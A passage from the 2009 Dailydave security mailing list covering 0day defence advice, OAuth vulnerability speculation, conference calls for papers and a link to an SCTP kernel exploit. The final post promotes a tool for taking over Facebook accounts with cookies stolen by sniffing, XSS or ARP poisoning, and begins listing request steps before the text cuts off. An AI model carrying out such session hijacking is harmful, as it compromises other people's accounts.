<887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com> <2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com> <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com> Message-ID: <49EDD6D8.8030702@gmx.de> Since this was a serious question, my advice regarding protection from 0day: 1) If you are a private entity with a limited downside to data loss, don't bother protecting. Insure. 2) Everybody lives with insecure doorlocks. Nobody worries about 0day against locks: Insurance will cover you. 3) If you feel like you absolutely have to protect against 0day, do: 3.1) Minimize the amount of code running.
Try to cut it to a quantity that you can read & understand. (Good luck). 3.2) Make sure you have something equivalent to pax 3.3) Avoid anything that would allow an attacker active scripting in any way, shape, or form. No Jscript, No Flash etc. 3.4) Contemplate recompiling the system from scratch using data structure layout randomization 3.5) Try to understand published attack methods to better be able to evaluate countermeasures 3.6) Monitor the system carefully. Log all network traffic in and out, and try to account for any outflow. 3.7) Avoid giving any attacker any information about applications, OS versions etc. If you are still getting work done at this point, I can invent more productivity-destroying measures :) 0day protection is a bit like minimizing risk for STDs. As you add layers of protection, you approach abstinence quickly -- e.g. reaching a state where you still carry a risk of dying but have none of the fun. Cheers, Halvar From pusscat at metasploit.com Tue Apr 21 09:27:00 2009 From: pusscat at metasploit.com (Lurene Grenier) Date: Tue, 21 Apr 2009 09:27:00 -0400 Subject: [Dailydave] How do I defend against 0day? In-Reply-To: <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com> References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com> <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com> <2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com> <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com> Message-ID: <8e00af420904210627o273b0eb7g63d2133e5a642a35@mail.gmail.com> > 1) Switch to an open-source operating system and open-source > applications. Create custom forks of each of my applications' source > trees, and patch my forks against the 0day vulnerabilities I > purchased. Don't share my patches with the outside world. Why is an open source operating system necessary for the creation of patches? 
Maybe Dave is suggesting you take classes and look at canvas so that you gain an understanding of 0-day attacks, both in how to create them, and thus how to defend against them by learning what makes them feasible in the real world (through classes), and also by learning the state of the art of exploitation of modern operating systems (through canvas) Then with that understanding, and with the knowledge of what is cost effective to your enterprise (functionality vs. sensitivity of data) you can take reasonable steps to protect that enterprise. Without this knowledge though, you're effed. -- ~ Lurene From dave.aitel at gmail.com Wed Apr 22 18:20:13 2009 From: dave.aitel at gmail.com (Dave Aitel) Date: Wed, 22 Apr 2009 18:20:13 -0400 Subject: [Dailydave] OAuth vulnerabilities, and insane partial disclosure people. Message-ID: http://news.cnet.com/8301-13577_3-10225103-36.html Apparently OAuth has a vulnerability (which was pretty obvious when Twitter pulled it down without saying why). But, in the spirit of Christmas, they've decided to say there IS a vulnerability, but we're not going to tell you what it is. Anyone care to guess? -dave From meddington at gmail.com Wed Apr 22 20:40:58 2009 From: meddington at gmail.com (Michael Eddington) Date: Wed, 22 Apr 2009 17:40:58 -0700 Subject: [Dailydave] OAuth vulnerabilities, and insane partial disclosure people. In-Reply-To: References: Message-ID: <49EFB91A.2020506@gmail.com> Well, one thing that jumps out is the signing of the requests is the only part that truly identifies the consumer to the protected resource, but the signing is optional and up to the consumer to request. Since this is a clear-text protocol that is meant to work over non-SSL'd connections there is no assumption of privacy for any of the tokens in play. 
See section "9.4 PLAINTEXT" in the 1.0 specification (http://oauth.net/core/1.0) Additionally, the assertion that PLAINTEXT signing is okay if performed over SSL seems bogus since SSL does not provide identity of the client, only server by default, hence anyone could perform an SSL connection and provide the oauth tokens with no signing to impersonate a consumer. Finally, I find it very amusing that the protocol transfers secrets in the clear, for example the oauth_token_secret is provided to the consumer over HTTP response and is not encrypted. Should the secret ever be used by itself to perform signing we will have a problem. Still, I'm not sure if any of these qualifies for a "social engineering attack" as stated in the CNET article. Granted, we should only take their explanation with a grain of salt. mike Dave Aitel wrote: > http://news.cnet.com/8301-13577_3-10225103-36.html > > Apparently OAuth has a vulnerability (which was pretty obvious when > Twitter pulled it down without saying why). But, in the spirit of > Christmas, they've decided to say there IS a vulnerability, but we're > not going to tell you what it is. Anyone care to guess? > > -dave > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From msuiche at gmail.com Thu Apr 23 03:49:23 2009 From: msuiche at gmail.com (Matthieu Suiche) Date: Thu, 23 Apr 2009 09:49:23 +0200 Subject: [Dailydave] OAuth vulnerabilities, and insane partial disclosure people. In-Reply-To: <49EFB91A.2020506@gmail.com> References: <49EFB91A.2020506@gmail.com> Message-ID: <36615a170904230049je67da7dw24a6d54c86fcd4a7@mail.gmail.com> Dave... You are a very bad guy. http://groups.google.com/group/oauth/browse_thread/thread/20e12ace524dba3?pli=1 "Please do not speculate or publicly discuss the actual details of this or other threats." 
said Eran Anyway, details are public now: http://www.hueniverse.com/hueniverse/2009/04/explaining-the-oauth-session-fixation-attack.html#more http://oauth.net/advisories/2009-1 -- Matthieu Suiche On Thu, Apr 23, 2009 at 2:40 AM, Michael Eddington wrote: > Well, one thing that jumps out is the signing of the requests is the > only part that truly identifies the consumer to the protected resource, > but the signing is optional and up to the consumer to request. Since > this is a clear-text protocol that is meant to work over non-SSL'd > connections there is no assumption of privacy for any of the tokens in play. > > See section "9.4 PLAINTEXT" in the 1.0 specification > (http://oauth.net/core/1.0) > > Additionally, the assertion that PLAINTEXT signing is okay if performed > over SSL seems bogus since SSL does not provide identity of the client, > only server by default, hence anyone could perform an SSL connection and > provide the oauth tokens with no signing to impersonate a consumer. > > Finally, I find it very amusing that the protocol transfers secrets in > the clear, for example the oauth_token_secret is provided to the > consumer over HTTP response and is not encrypted. Should the secret > ever be used by itself to perform signing we will have a problem. > > Still, I'm not sure if any of these qualifies for a "social engineering > attack" as stated in the CNET article. Granted, we should only take > their explanation with a grain of salt. > > mike > > Dave Aitel wrote: >> http://news.cnet.com/8301-13577_3-10225103-36.html >> >> Apparently OAuth has a vulnerability (which was pretty obvious when >> Twitter pulled it down without saying why). But, in the spirit of >> Christmas, they've decided to say there IS a vulnerability, but we're >> not going to tell you what it is. Anyone care to guess? 
>> >> -dave >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From alex at sotirov.net Thu Apr 23 19:11:44 2009 From: alex at sotirov.net (Alexander Sotirov) Date: Thu, 23 Apr 2009 19:11:44 -0400 Subject: [Dailydave] WOOT'09 call for papers Message-ID: <20090423231144.GA16691@MacBook.local> The CFP for the 3rd USENIX Workshop on Offensive Technologies is now available at http://www.usenix.org/woot09/cfpa WOOT'09 aims to bring together researchers and practitioners in system security to present research advancing the understanding of attacks on operating systems, networks, and applications. WOOT seeks submissions that reflect the state of the art in offensive computer security technology--either surveying previously poorly known areas or presenting entirely new attacks. We welcome papers on offensive technologies, including but not limited to: - Vulnerability research (software auditing, reverse engineering) - Exploitation techniques and automation - Network-based attacks (routing, DNS, IDS/IPS/firewall evasion) - Reconnaissance (scanning, software, and hardware fingerprinting) - Malware design and implementation (rootkits, viruses, bots, worms) - Denial-of-service attacks - Web and database security - Penetration testing - Weaknesses in deployed systems (VoIP, telephony, wireless, games) - Practical cryptanalysis (hardware, DRM, etc.) WOOT'09 will be a one-day event on Monday, August 10. It will be co-located with the 18th USENIX Security Symposium in Montreal, Canada. The submission deadline for papers is 11:59 p.m. PDT on Tuesday, May 26, 2009. We look forward to your submissions. 
Dan Boneh, Stanford University Alexander Sotirov, independent security researcher WOOT'09 Program Chairs woot09chairs at usenix.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090423/03cdf357/attachment.pgp From no-reply at ekoparty.com.ar Thu Apr 23 18:02:20 2009 From: no-reply at ekoparty.com.ar (ekoparty security) Date: Thu, 23 Apr 2009 19:02:20 -0300 Subject: [Dailydave] CFP for ekoparty 0x09 is now open! [ Buenos Aires, Argentina ] Message-ID: <85C57A8C-C7A2-4EBF-A529-5042C90FF111@ekoparty.com.ar> [*] ekoparty Security Conference and Trainings - 5th edition [*] www.ekoparty.com.ar Trainings: September 14-16 / Conference: September 17-18, 2009 Ciudad Autonoma de Buenos Aires, Argentina [*] CALL FOR PAPERS is now Open! ekoparty is a one-of-a-kind event in South America; an annual security conference held in Buenos Aires where security specialists from all over Latin America (and beyond) have the chance to get involved with state-of-the-art techniques, vulnerabilities and tools in a relaxed environment which has not been seen before. The fifth edition of ekoparty is expected to bring together over 500 security specialists from around the world in the most deep-knowledge technical conference of Latin America. This is not just a completely technical conference; it also has a lot of fun activities like lockpicking, wardriving, wargames, after hours and even an awesome aftercon party! On this edition we are going to have simultaneous translation of all the lectures, offering attendees from foreign countries the chance to understand Spanish and Portuguese speakers, as well as locals to understand English-spoken talks. ekoparty is recruiting everyone who is interested in showing their research and/or developments in the field of Information Security. 
[*] WHERE TO SEND LECTURES: Abstracts not exceeding 250 words should be submitted (in plain text format) to: charlas/\ekoparty.com.ar for review and possible inclusion in the programme. Submissions are due no later than August 1. Topics of interest include, but are not limited to the following: - Asado Debugging - 0 days - Web Security - Embedded Systems Technologies - GSM, GPRS and CDMA Security - RFID Security - VoIP Security - Wireless Security - Exploitation - IPv6 Security - Attack and Defense Techniques - Reverse Engineering - Application Security, Testing, Fuzzing - Code Auditing - Virtualization - Malicious Code - Databases - Viruses, Worms, and Trojans - e-crime, Phishing and Botnets - Malware, Crimeware - Banking Security - Phreaking - Hardware hacking - Cryptography - Forensics/AntiForensics [*] HOW TO SEND LECTURES: Submissions should include the following information: * Title * Type: - 45-minute lecture - 15-minute lecture (turbo talks) - Training (1 - 2 day) * Author(s): First and Last name, short personal description, country of origin, association or company they belong to if applicable. * Estimated delivery time: Speeches usually last 45 minutes. In case of needing more or less time it is going to be evaluated in the pre-selection stage. * Short description of the speech: One or two paragraphs explaining (not so briefly) the delivery content. * Target speech level: To classify as: newbie/intermediate/advanced/expert. * Author(s)' phone number. 
SPEAKER PRIVILEGES
- Round-trip airfare ticket
- 3 days accommodation
- Special BBQ
- ekoparty's City Tour
- Extra ticket to the conference

TRAINER PRIVILEGES
- 50 % net profit of the Class
- 2/3 days accommodation
- Special BBQ
- ekoparty's City Tour
- Ticket to the conference

[*] IMPORTANT DATES:
April 23 - CFP is Open
August 1 - CFP is Closed
September 14-16 - ekoparty Trainings
September 17-18 - ekoparty Conference

[*] SPONSOR INFORMATION
If you are interested in supporting our conference, contact us at sponsor/\ekoparty.com.ar

[*] GET IN TOUCH
Website http://www.ekoparty.com.ar
Blog http://blog.ekoparty.com.ar
Mailing-list http://groups.google.com/group/ekoparty
Twitter https://twitter.com/ekoparty
Facebook http://www.facebook.com/pages/ekoparty-security-conference/16162244291
LinkedIn http://www.linkedin.com/e/gis/42839/3C56B47CC210

Best regards,
ekoparty security conference staff

From nate at root.org Thu Apr 23 23:37:28 2009
From: nate at root.org (Nate Lawson)
Date: Thu, 23 Apr 2009 20:37:28 -0700
Subject: [Dailydave] OAuth vulnerabilities, and insane partial disclosure people.
In-Reply-To: <36615a170904230049je67da7dw24a6d54c86fcd4a7@mail.gmail.com>
References: <49EFB91A.2020506@gmail.com> <36615a170904230049je67da7dw24a6d54c86fcd4a7@mail.gmail.com>
Message-ID: <49F133F8.5070207@root.org>

Matthieu Suiche wrote:
> Dave... You are a very bad guy.
>
> http://groups.google.com/group/oauth/browse_thread/thread/20e12ace524dba3?pli=1
>
> "Please do not speculate or publicly discuss the actual details of this or
> other threats." said Eran
>
> Anyway, details are public now:
> http://www.hueniverse.com/hueniverse/2009/04/explaining-the-oauth-session-fixation-attack.html#more
> http://oauth.net/advisories/2009-1

The overlap between web 2.0 and cryptographers 1.0 is the empty set. See also "rainbow tables fiasco", wherein web 2.0 redesigned password salting, poorly.
--
Nate

From dave at immunityinc.com Fri Apr 24 09:49:30 2009
From: dave at immunityinc.com (dave)
Date: Fri, 24 Apr 2009 09:49:30 -0400
Subject: [Dailydave] Learn how to exploit heap overflows - the Nico way.
Message-ID: <49F1C36A.3010800@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

May 11-14[1] Immunity is going to be teaching Heap Overflows here in Miami. There really is not another class like this - it's understandable by normal humans and yet at the end of it, students are able to exploit heap overflows[2], and get a taste of bypassing Vista's heap protections. This is the same class we put Immunity exploit writers through to get them up to speed on heap exploitation, and there's lots of non-public information inside.

I find that people rarely get to _see_ a real exploit, let alone have one of the best exploit writers alive give them a personal walk-through of how these things work.

Email admin at immunityinc.com to sign up. Also, there will be parrots.

Thanks,
Dave Aitel
Immunity, Inc.

[1] http://www.immunityinc.com/education-currentschedule.shtml
[2] We use VisualSploit to make it approachable without making everyone learn Python, our API, and heap overflow methodology all at once.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAknxw2oACgkQtehAhL0gherojwCfeGcNRcIhq3u4sGCHBwFqNEO0
rUkAn2/JUfj6+296vfgebnigiuhBg1gr
=MJE8
-----END PGP SIGNATURE-----

From sinan.eren at immunitysec.com Fri Apr 24 17:40:36 2009
From: sinan.eren at immunitysec.com (sinan.eren at immunitysec.com)
Date: Fri, 24 Apr 2009 16:40:36 -0500 (EST)
Subject: [Dailydave] cloud!
Message-ID:

After enduring several integer overwraps within the section of neural nets that handles the meaning of the word "cloud" in my very dried out brain, I wish to state the following:

Virtualization has been the best thing that has happened to foreign intelligence since Aldrich Ames.
regards,
Sinan Eren
Immunity Inc.

From dave at immunityinc.com Mon Apr 27 12:23:26 2009
From: dave at immunityinc.com (dave)
Date: Mon, 27 Apr 2009 12:23:26 -0400
Subject: [Dailydave] 4420 + Rich Smith == All your CANVAS questions answered!
Message-ID: <49F5DBFE.2070008@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

For those of you in London or nearby, I hear that Immunity's very own Rich Smith will be at 4420 (and InfoSec, and that secret con, etc.) this month, and you can pester him with all of your CANVAS questions, or ask him what American food is like and why the beer comes in a "tower".

http://dc4420.org/site/index.php?topic=92.msg233#msg233

Likewise, he'll also be speaking at CONFidence in Krakow, Poland, for your VNC'ing pleasure.

Probably the one line out of his talk that I think people miss is that the goal of some of these tools (i.e. any automated scanner worth its salt) "is to turn the expensive part of attacking into bandwidth and network connectivity." Although there is, certainly, an expense associated with "What do I do with all these shells, now that I have them". Perhaps next month Nico's Face Recognition[1] module will be integrated and we can answer that one too. :>

Thanks,
Dave Aitel
Immunity, Inc.

[1] http://twitter.com/nicowaisman

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkn12/4ACgkQtehAhL0gheqF6QCdGrJg/spqQcC/kRLNDJV1YKDd
wlsAoIRI72xloJKNH5zqlQnocjjWziqN
=CTK2
-----END PGP SIGNATURE-----

From sgrakkyu at openssl.it Mon Apr 27 21:49:37 2009
From: sgrakkyu at openssl.it (sgrakkyu)
Date: Tue, 28 Apr 2009 03:49:37 +0200
Subject: [Dailydave] Remote kernel bug in SCTP?
In-Reply-To: <49BA9D9C.7090606@immunityinc.com>
References: <49BA9D9C.7090606@immunityinc.com>
Message-ID: <49F660B1.3000302@openssl.it>

dave wrote:
> Did everyone else already know about this bug? So you connect to an SCTP
> endpoint, then send a packet to overwrite arbitrary kernel data? That'd
> be cool.
>
> This is where Phillipe tells us about his scanner from 2002. :>
>
> -dave
>

Hi everybody, I saw some stream of mails wondering about this SCTP issue: some sayin' it's a D.o.S., some other thinking about a local exploit.
It started as a challenge and it ended up as a lot of fun and a reliable one-shot remote exploit for Linux SLUB/SLABs.

Here you go the link: http://sgrakkyu.antifork.org/sctp_houdini.c
(it covers x86-64 kernels only)

and here you go a small blog post I made for it: http://kernelbof.blogspot.com
More details might be added, if someone is interested.
Hope you'll have at least half of the fun I had in developing it :)

Cheers,

-sgrakkyu

From mark.bristow at owasp.org Mon Apr 27 23:19:22 2009
From: mark.bristow at owasp.org (Mark Bristow)
Date: Mon, 27 Apr 2009 22:19:22 -0500
Subject: [Dailydave] OWASP AppSec DC 2009 CALL FOR PAPERS
Message-ID: <49F675BA.20403@owasp.org>

Colleagues,

OWASP is currently soliciting papers for the OWASP AppSec DC 2009 Conference that will take place at the Walter E. Washington Convention Center in Washington, DC on November 10th through 13th of 2009. There will be training courses on November 10th and 11th followed by plenary sessions on the 12th and 13th, with each day having at least three tracks. AppSec DC may also have BOF, break out, or speed talks in addition to the standard schedule depending on the submissions we receive.

We are seeking people and organizations that want to present on any of the following topics (in no particular order):

- Business Risks with Application Security.
- Starting and Managing Secure Development Lifecycle Programs.
- Web Services-, XML- and Application Security.
- Metrics for Application Security.
- Application Threat Modeling.
- Hands-on Source Code Review.
- Web Application Security Testing.
- OWASP Tools and Projects.
- Secure Coding Practices (J2EE/.NET).
- Privacy Concerns with Applications and Data Storage
- Web Application Security countermeasures
- Technology specific presentations on security such as AJAX, XML, etc.
- Anything else relating to OWASP and Application Security.

To make a submission you must include:

- Presenter(s) name(s)
- Presenter(s) Email and/or Phone number(s)
- Presenter(s) bio(s)
- Title
- Abstract
- Any supporting research/tools (will not be released outside of CFP committee)

Submission deadline is June 15th 2009 at 11:59 PM Eastern Standard Time.

Submit Proposals To mark.bristow(at)owasp.org with the subject line "APPSEC DC CFP SUBMISSION" (an automated filter is used). Additional information can be found in the FAQ.

Conference Website: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
FAQ: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009_-_FAQ
CFP w/ FAQ: http://www.owasp.org/images/6/65/AppSec_DC_2009_CFP.pdf

Please forward to all interested practitioners and colleagues.

Regards,

--
Mark Bristow
AppSec DC 09 - https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC
OWASP GCC - https://www.owasp.org/index.php/Global_Conferences_Committee

From tomi.tuominen at iki.fi Tue Apr 28 04:41:03 2009
From: tomi.tuominen at iki.fi (Tomi Tuominen)
Date: Tue, 28 Apr 2009 11:41:03 +0300
Subject: [Dailydave] T2'09: Call for Papers 2009 (Helsinki / Finland)
Message-ID: <49F6C11F.9080906@iki.fi>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

### T2'09 - Call For Papers ###
Helsinki, Finland
29 - 30 October 2009

We are pleased to announce the annual T2'09 conference, which will take place in Helsinki, Finland, from October 29 to 30, 2009. We are looking for original technical presentations in the fields of information security. Presentations should last a minimum of 60 minutes and a maximum of two hours and be presented in English.

We will be accepting talk proposals until July 1, 2009.
All submitted presentations will be reviewed by the T2 Advisory Board. As usual, selected speakers will be reimbursed for travel and hotel costs. We pride ourselves on taking good care of the speakers, and there is always something going on during the evenings :)

We strongly suggest that you submit earlier rather than later, since we will close the CFP early once we receive enough quality submissions to fill the slots.

Please include the following with your submission:

1. Presenter, and geographical location (country of origin/passport)
2. Contact information (email, cell phone and postal address)
3. Brief biography (including employer and/or affiliations)
4. Motivations for presentation (500 words max)
5. Presentation abstract (500 words max)
6. If your presentation references a paper or piece of software that you have published, please provide us with either a copy of the said paper or software, or a URL where we can obtain it.
7. List any other publications or conferences where this material has been or will be published/submitted

Please send the above information to cfp-2009 (at) lista.t2.fi

===

For more information: http://www.t2.fi/
Links to past schedules: http://www.t2.fi/schedules/
What speakers are saying: http://radian.org/notebook/van-helsingfors
What attendees are saying: http://www.northern-monkee.co.uk/pub/news/Entries/2008/10/19_T2_08_.fi.html

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkn2wR4ACgkQizO45EruiTWGCQCgtpdQU4Ccza/iy18upKTnDbVe
M+8AoNtm/RTirv936YtYhElKz4xv9vsw
=XypD
-----END PGP SIGNATURE-----

From 0xjbrown41 at gmail.com Tue Apr 28 11:52:09 2009
From: 0xjbrown41 at gmail.com (Jeremy Brown)
Date: Tue, 28 Apr 2009 11:52:09 -0400
Subject: [Dailydave] Remote kernel bug in SCTP?
In-Reply-To: <49F660B1.3000302@openssl.it>
References: <49BA9D9C.7090606@immunityinc.com> <49F660B1.3000302@openssl.it>
Message-ID:

I love the amount of research you put into this; challenges can be fun and quite beneficial, as we all know.
Although the world just tilted slightly, great work =)

On Mon, Apr 27, 2009 at 9:49 PM, sgrakkyu wrote:
> dave wrote:
>> Did everyone else already know about this bug? So you connect to an SCTP
>> endpoint, then send a packet to overwrite arbitrary kernel data? That'd
>> be cool.
>>
>> This is where Phillipe tells us about his scanner from 2002. :>
>>
>> -dave
>>
>
> Hi everybody, I saw some stream of mails wondering about this SCTP
> issue: some sayin' it's a D.o.S., some other thinking about a local
> exploit.
> It started as a challenge and it ended up as a lot of fun and a reliable
> one-shot remote exploit for Linux SLUB/SLABs
>
> Here you go the link: http://sgrakkyu.antifork.org/sctp_houdini.c
> (it covers x86-64 kernels only)
>
> and here you go a small blog post I made for it:
> http://kernelbof.blogspot.com
> More details might be added, if someone is interested.
> Hope you'll have at least half of the fun I had in developing it:)
>
> Cheers,
>
> -sgrakkyu
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From dave at immunityinc.com Wed Apr 29 11:05:03 2009
From: dave at immunityinc.com (dave)
Date: Wed, 29 Apr 2009 11:05:03 -0400
Subject: [Dailydave] Trust is a fractal
Message-ID: <49F86C9F.5010905@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

One thing I always like to watch is how organizations struggle with trust - typically in two ways:

1. They assume data can be "classified", but then fall down when trying to figure out how to classify A or B when unclassified data A and B can be combined to deduce classified data C. This is great for when Anti Data Leakage vendors are trying to solve any problem greater than "My source code is being emailed out via GMail".

2. They apply single sign on to web applications. It's basically impossible to secure Sharepoint once people decide they want single sign on.
So those are easy and fun gigs for the whole family! Sharepoint's not easy to secure under the best of situations (hello blacklists!), but add single sign on to it and you get entire new realms of insecurity.

In the end, for any level of scale, you always end up with "I don't even know who I trust". This is not a comfortable place for a CSO to be in.

- -dave

Is it too early in the morning for kerberos jokes? :>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkn4bJ8ACgkQtehAhL0gheqcdACffbOA/wLosfUz2zkl5VZP8NDI
2NAAn2pHFep8TqPDnjl08o5Da11Kdllo
=IDqc
-----END PGP SIGNATURE-----

From dan at geer.org Wed Apr 29 11:34:58 2009
From: dan at geer.org (dan at geer.org)
Date: Wed, 29 Apr 2009 11:34:58 -0400
Subject: [Dailydave] MetriCon 4.0
Message-ID: <20090429153458.7F69B341D1@absinthe.tinho.net>

On behalf of the program committee, may I please direct your attention to your possible participation in MetriCon 4.0.

The MetriCon 4.0 Workshop will be held on Tuesday, August 11, 2009, in Montreal, Quebec, co-located with the USENIX Security Symposium. All who are interested in participating should review the formal Call for Participation and, as it says, soon communicate via email to the MetriCon 4.0 program committee. As with all MetriCon events, MetriCon 4.0 is by invitation, with both invitations for attendance-only and for attendance with presentation possible. Please be in touch.

The theme of this episode is The Importance of Context. This workshop series is intense, and is focused on progress rather than claims of first discovery.
See http://securitymetrics.org/content/Wiki.jsp?page=Metricon4.0

Dan Geer

From dave at immunityinc.com Wed Apr 29 12:17:19 2009
From: dave at immunityinc.com (dave)
Date: Wed, 29 Apr 2009 12:17:19 -0400
Subject: [Dailydave] JBIG video
Message-ID: <49F87D8F.4090402@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This video is quite good and there's Adobe Reader 0day and everything! It's the story of the JBIG vulnerability, and how the VRT dealt with it, along with an embarrassing timeline.

http://www.dojosec.com/?p=92

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkn4fY8ACgkQtehAhL0gherxRgCfR2ChpHX60ukrAmQ78s9Kub1L
XgcAnRcxIW+pu/Sub4VdM9hnw9dyWtfQ
=m2kN
-----END PGP SIGNATURE-----

From frankruder at hotmail.com Wed Apr 29 21:00:28 2009
From: frankruder at hotmail.com (cocoruder.)
Date: Thu, 30 Apr 2009 01:00:28 +0000
Subject: [Dailydave] JBIG video
In-Reply-To: <49F87D8F.4090402@immunityinc.com>
References: <49F87D8F.4090402@immunityinc.com>
Message-ID:

There is also a zero-day vulnerability (not the Adobe Reader one) in it; did anyone notice it? Dig into it carefully :)

Regards,
cocoruder, welcome to my blog: http://ruder.cdut.net

> Date: Wed, 29 Apr 2009 12:17:19 -0400
> From: dave at immunityinc.com
> To: dailydave at lists.immunityinc.com
> Subject: [Dailydave] JBIG video
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> This video is quite good and there's Adobe Reader 0day and everything!
> It's the story of the JBIG vulnerability, and how the VRT dealt with it,
> along with an embarrassing timeline.
>
> http://www.dojosec.com/?p=92
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org
>
> iEYEARECAAYFAkn4fY8ACgkQtehAhL0gherxRgCfR2ChpHX60ukrAmQ78s9Kub1L
> XgcAnRcxIW+pu/Sub4VdM9hnw9dyWtfQ
> =m2kN
> -----END PGP SIGNATURE-----
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

From hl2009 at hack.lu Thu Apr 30 08:40:06 2009
From: hl2009 at hack.lu (hack.lu 2009 info)
Date: Thu, 30 Apr 2009 14:40:06 +0200
Subject: [Dailydave] Call for Papers Hack.lu 2009
Message-ID: <49F99C26.8000601@hack.lu>

Call for Papers Hack.lu 2009
============================

The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each other and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2009 (28-30.10.2008).

The conference is three days of active discussions, presentations and workshops for sharing experience around new attacks, defensive techniques and information security (including funky experiments).

We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the hack.lu technical review committee. This year we will be doing one hour talks, and some shorter talk sessions.
Scope:
------

Topics of interest include, but are not limited to:

- Software Engineering and Security
- Honeypots/Honeynets
- Spyware, Phishing and Botnets (Distributed attacks)
- Newly discovered vulnerabilities in software and hardware
- Electronic/Digital Privacy
- Wireless Network and Security
- Attacks on Information Systems and/or Digital Information Storage
- Electronic Voting
- Free Software and Security
- Assessment of Computer, Electronic Devices and Information Systems
- Standards for Information Security
- Legal and Social Aspect of Information Security
- Software Engineering and Security
- Security in Information Retrieval
- Network security
- Forensics and Anti-Forensics
- Mobile communications security and vulnerabilities

Deadlines:
----------

The following dates are important if you want to participate in the CfP:

Abstract submission: no later than 15 June 2009
Full paper submission: no later than 1st August 2009
Notification date: mid/end of August

Submission guideline:
---------------------

Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstracts are up to 400 words.

Submissions must be sent using the following interface: http://2009.hack.lu/papers/

Submissions should also include the following:

1. Presenter, and geographical location (country of origin/passport) and contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Information about whether the submission has already been presented, and where.
The information will be used only for the sole purpose of the hack.lu convention, including the information on the public website. If you want to remain anonymous, you have the right to use a nickname.

Speakers' Privileges:
---------------------

- Accommodation will be provided (3 nights).
- Travel expenses will be covered up to a max amount.
- Conference speakers night.

Publication and rights:
-----------------------

Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication.

Sponsoring:
-----------

If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu

Web site and wiki:
------------------

http://2009.hack.lu/

From quakerdoomer at inbox.lv Thu Apr 30 16:31:35 2009
From: quakerdoomer at inbox.lv (QUAKER DOOMER)
Date: Thu, 30 Apr 2009 23:31:35 +0300
Subject: [Dailydave] FBController - (Facebook Control Utility) version 1.0
Message-ID: <1241123495.49fa0aa7e635b@mail.inbox.lv>

FBController - The Ultimate Utility to Control Facebook accounts without the Password.

Let me be clear that this utility WON'T hack/crack Facebook accounts. The utility will need biscuits/cookies instead of the password. Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, scroogle search, anyhow! Once you have the cookies you can use FBController and have full control over the target's Facebook account.

==============================================================

Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate an OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.

2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)

[code]
GET /home.php? HTTP/1.1
